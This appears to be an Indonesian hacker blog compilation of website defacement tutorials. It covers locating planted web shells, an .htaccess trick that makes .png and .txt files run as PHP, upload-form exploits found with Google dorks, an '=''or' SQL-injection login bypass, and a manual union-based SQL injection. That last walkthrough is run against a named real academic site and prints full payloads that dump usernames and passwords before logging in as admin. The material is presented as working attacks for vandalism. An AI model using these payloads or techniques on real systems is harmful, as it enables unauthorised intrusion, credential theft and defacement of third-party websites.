Hy Buriq
Kali Ini Gw Hidayat Gans Akan Membagikan Cara Mencari Tempat Dimana Akses Kita Tertanam

Biasanya Saat Kita Ingin Membuka Akses Shell Kita Kita Harus Tekan Lama Dan Klik "Buka Ditab Baru"
Nah Tapi Pasti Ada Salah Satu Web Yang Tidak Bisa Menggunakan Cara Itu...

Oke Langsung Saja Ke TKP


Nah Website Diatas Adalah Website Yang Telah Saya Upload Shell
Tapi Disana Saya Tidak Bisa Menekan Lama Gambar Yang Rusak Tersebut...
Nah Cara Lain Untuk Mencari Akses Shell Kita Adalah Menggunakan "view-source:" Yang Berguna Membuka Semua Kode HTML... Oke Cara Menggunakannya Adalah Dengan Menambahkan "view-source:" didepan weblu...
Contoh : http://hidayatgans.ya -> view-source:http://hidayatgans.ya....
Maka Akan Muncul Kode HTML


Cari Yang Berhubungan Dengan Akses Shell Lu ( Liat Gambar Diatas )
Biasanya <a href="path/path/namashell.php>
Pokoknya Yang Berhubungan Dengan Shell Lu
Kalo Udah Nemu Tinggal Klik Deh


And Boooom Saya Dah Nemu Jodoh Saya... Eh mksdnya Shell saya
And Then From Here You Know
Happy Deface :v

Hello Sobat Missqueen
Balik Lagi Ama Gw Orang Tampan Yang Jadi Idaman Mantan :v
Oke Kali Ini Gw Bakal Jelasin Fungsi Dari File .htaccess
Oke Sekedar Info Aja... Mungkin Kalian Para Defacer Tidak Asing Lagi Dengan File Yang Satu Ini
Hanya Sekedar Mengingatkan Bahwa File Satu Ini Biasanya Digunakan Saat Kita Deface dan Ingin Menebas Suatu Web Dengan Proof Com_Fabrik
Nah Balik Lagi Ke Topik Utama
Untuk Kalian Yang Gamau Ribet Ngebackup Index Dari Web Tersebut Kalian Bisa Menggunakan File Ini Untuk Menebas Halaman Depan Tanpa Merubah File index.php
Nah Oke Mari Kita Kupas Isi Dari .htaccess ini

.htaccess
#Alternate default index page
DirectoryIndex index.php/index.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

Diatas Adalah Isi Dari File .htaccess
Disana Ada Tulisan "DirectoryIndex" Yang Berarti Tempat Dimana Halaman Depan Suatu Web atau Folder
Nah Setelah Ada Tulisan "DirectoryIndex" Ada Tulisan "index.php/index.html" Nah Tulisan Tersebut Bermaksud Bahwa Halaman Depan Suatu Web atau Folder Akan Ditampilkan Dari Source Code Dalam File Tersebut
Kalau Sobat Missqueen Gamau Repot** Ngebackup Caranya Sebagai Berikut :

[!] Upload Script Kalian Didalam Dir public_html
[!] Cari File .htaccess
[!] Pilih "edit" (didalam shell kalian sudah ada)
[!] Tulisan "index.php/index.html" Diganti Dengan    NamaFileKalian.php/NamaFileKalian.html
[!] Cek Halaman Depan Web Tersebut
[!] Kalo Halaman Depan Merupakan Script Kalian
[!] Selamat Anda Telah Menjadi Hacker

Oke Sekian Pembahasan .htaccess Kali Ini
Sampai Jumpa Next Time C0K


Hy Njing Balik Lagi Ama Gw Hidayat Gans
Kali Ini Gw Bakal Ngasih Tutorial Deface Dengan Proof CBT Siap in Bahan Bahannya C0K

1. Dork -> inurl:/panel/pages/login.php [Kembangin Biar Dapet Yang Fresh]

2. Exploit -> /[path]/panel/pages/upload-file.php
                      /[path/panel/pages/upload_image.php
                      [Kembangin Sampek Blank]

3. Mini Shell -> Kiss Me

4. Csrf Online -> Touch Me

5. Ketamvanan

Oke Berhubung Gw Udh Punya Target Langsung Aja Ke TKP



Blank? Auto Masukkin Ke CSRF ONLEN




Url -> Weblutadi.com
POSTFILE -> uploadfile
Trus Klik "Lock Target"


Tinggal Pilih Mini Shell Kesayangan Anda
Jika Berhasil Terdapat Tulisan "success" Dipojok Atas Kiri



Nah Muncul Tulisan Success Tinggal Kita Cari Tempat Shellnya Ke Upload
Nah Dari Sini Use Your Brain Untuk Nyari Tempat Shell Kalian :v
Bercanda Ya Njing
Akses -> weblu.com/images/shelllu.php


Dan Boom Dari Sini You Know lah
Happy Deface :v

Hy Njing Kali Ini Gw Bakal Kasih Tutorial Deface Dengan Methode Bypass Admin
Siapin Bahan Bahannya Dulu Njing

1. Dork -> inurl:admin/index.php intitle:"Login" [Kembangin Pake Otak Vokp Lu]
2. Shell Mini -> Kiss Me
3. Ketampanan
4. Kopi Rokok [Kalo Doyan]

Oke Langsung Aja Mumpung Gw Udah Nemu Webnya Langsung Ke TKP


Isi User : '=''or'
      Pass : '=''or'


Vuln? Langsung Masuk Ke Dashboard
Kita Cari Tempat Upload Shellnya
Diatas Tempat Upshellnya Di Gallery


Langsung Aja Isi Kolom Kolomya + Select File Untuk Pilih Mini Shell Kalian
Truss Pencet "Add Gallery" Deh


Kalo Berhasil Ada Tulisan "Success"
Kalo Udah Balik Lagi Ke "Gallery List"


Cari Mini Shell Kalian Dan Tekan Lama Gambar Yang Rusak Trus Klik "Open In New Tab"


Dan Booomm Shellnya Dah Ketanem
You Knowlah Klo Udah Begini
Happy Deface

Assalamualaikum Wr. Wb
Balik Lagi Ama Gw Eaaa
Kali Ini Gw Bakal Kasih Tutorial Deface Regrister Member
Siapin Dulu Bahan-bahannya

1. Dork -> Banyak Digoogle
2. Mini Shell. Belom Punya Download Disini
3. Kopi + Rokok (Kalo Doyan :v)
4. Faktor Ketampanan Juga Perlu

Oke Langsung Aja Ketutorial
Live Target -> Kiss Me
Berhubung Gw Udh Ada Target Langsung Aja Praktek
Buka Live Targetnya
Maka Tampilannya Akan Seperti Dibawah Ini


Tunggu Apa Lagi? Langsung Kita Create Account
Maka Tampilannya Akan Seperti Ini


Nahh Muncul Kolom Kolomnya
Kita Isi Bebas Terserah Kalian Tapi Email Harus Punya Kalian + Jangan Lupa Passwordnya
Kalo Sudah Diisi Semua Klik Tombol Warna Hijau
Kalo Ada Pesan Dari Gmail Tinggal Kita Cek dan Pencet Link Yang Ada Dipesan


Oke Kita Pencet Linknya


Dan Boom Redirect Ke Login User
Nunggu Apa? Kita Isi Dengan Email + Password Yang Tadi Trus Login Deh


Boom Sekarang Saya Sudah Menjadi Member
Kita UpShell Di "Unggah foto"


Kalo Sudah Kita Unggah Foto


Oke Kalo Sudah Teken Lama Gambarnya Kalo Muncul Kayak Gambar Diatas Kita "Buka Di Browser"


Dan Booom Shell Backdoor Dah Ketanam
Nunggu Apalagi? Happy Deface
Sekian Tutorial Kali Ini Semoga Bermanfaat
Wassalamualaikum Wr. Wb
Assalamualaikum Wr.Wb
Balik Lagi Ama Gw :v
Lama Gak Post Njier :v
Oke Kali Ini Gw Bakal Share Tutorial Deface Sql Secara Manual

Bahan-bahan:

1. Dork
2. Kopi + Rokok
3. Kesabaran
4. Dibutuhkan Ketamvanan

Oke Langsung TKP

Dork:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=

Kembangin Sama Otak Wibu Lu

Oke Gw Udah Nemu Target

http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431

Oke Cara Ngecek Vuln Sql Atau Enggak Kita Tinggal Nambahin ( ' ) Diakhir Link Tanpa Tanda Kurung
Jadi Seperti Ini


http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431'

Nah Kalo Blank Atau Muncul Tulisan "You have an error in your SQL syntax" Berarti Vuln

Kalo Target Kita Websitenya Blank



Nah Kalo Udah Nemu Yang Vuln Kita Dump Pake Perintah

+order+by+1--+-- 

Taruh Dibelakang Link 
Jadi Gini

http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+1--+--

Tapi Itu Gak Blank / Error Jadi Angkanya Digedein Sampek Blank / Error

Nah Gw Nemuin Errornya Diangka 28

http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+28--+--

Berarti Jumlah Tabel Pada Databasenya Ada 27

Nah Kalo Udah Ketemu Jumlah Tabelnya Kita Dump Dengan Perintah

+union+select+(sesuai jumlah tabel)--

Tapi Sebelum Angka Kasih Tanda ( - ) Tanpa Tanda Kurung

Jadi Linknya Akan Seperti Ini

http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

Nah Kalau Udah Pasti Keluar Angka Keramat :v


Nah Disini Yang Keluar Adalah Angka 9 Jadi Tabel Itulah Yang Sekiranya Dimasukkan Perintah Selanjutnya. Dengan Syarat Angka 9 Tadi Dihapus Dengan Perintah Selanjutnya...

Perintah Selanjutnya Adalah

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Maka Linknya Akan Jadi Seperti Ini

http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1,2,3,4,5,6,7,8,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

Kalo Udah Kita Udah Nemu Nama Nama Tabelnya


Nah Disini Kita Cari Sesuatu Yang Berhubungan Dengan Username Dan Password... Nah Digambar Udah Ada Tabel "user" Yang Berhubungan Dengan Username dan Password... Mari Kita Cari User dan Pass nya Dengan Perintah

(select(@x)from(select(@x:=0x00),(select(@x)from(Nama Tabel)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,Yang Mau Kalian Cari,0x203a3a20,Yang Mau Kalian Cari))))x)

Nah Tulisan Yang Berwarna Biru Sesuaiin Ama Apa Yang Kalian Cari... Berhubung Kita Mau Mencari Username & Password Maka Kita Melakukan Perintah Seperti Berikut

(select(@x)from(select(@x:=0x00),(select(@x)from(user)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x)

Nah Maka Linknya Berubah Jadi

http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(@x)from(user)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

Maka Akan Muncul Username & Password nya


Sudah Nemu Username + Password nya?
Nunggu Apa Lagi? Login Lah :v
Nah Hal Paling Sulit Di Sql Ya Nemuin Admin Login :v
Berhubung Saya Udah Nemu Tinggal Sikat Aja


Kalo Username & Password nya Bener Langsung Tembus Ke Dashboard


Nih Saya Tembus... Nunggu Apa Lagi? Happy Deface :v

Jangan Lupa Share & Coment :v